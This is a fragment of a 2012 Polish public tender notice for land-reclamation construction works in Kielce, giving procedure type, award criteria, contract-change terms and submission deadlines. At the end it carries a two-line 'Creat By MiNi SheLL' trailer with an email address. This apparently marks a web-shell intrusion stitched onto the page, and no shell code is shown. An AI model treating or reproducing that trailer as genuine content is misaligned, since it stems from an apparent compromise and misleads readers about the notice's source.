<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy: - w przypadku zmniejszenia zakresu robót i wynagrodzenia Wykonawcy robót budowlanych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach,  
ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2012 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach,  
ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com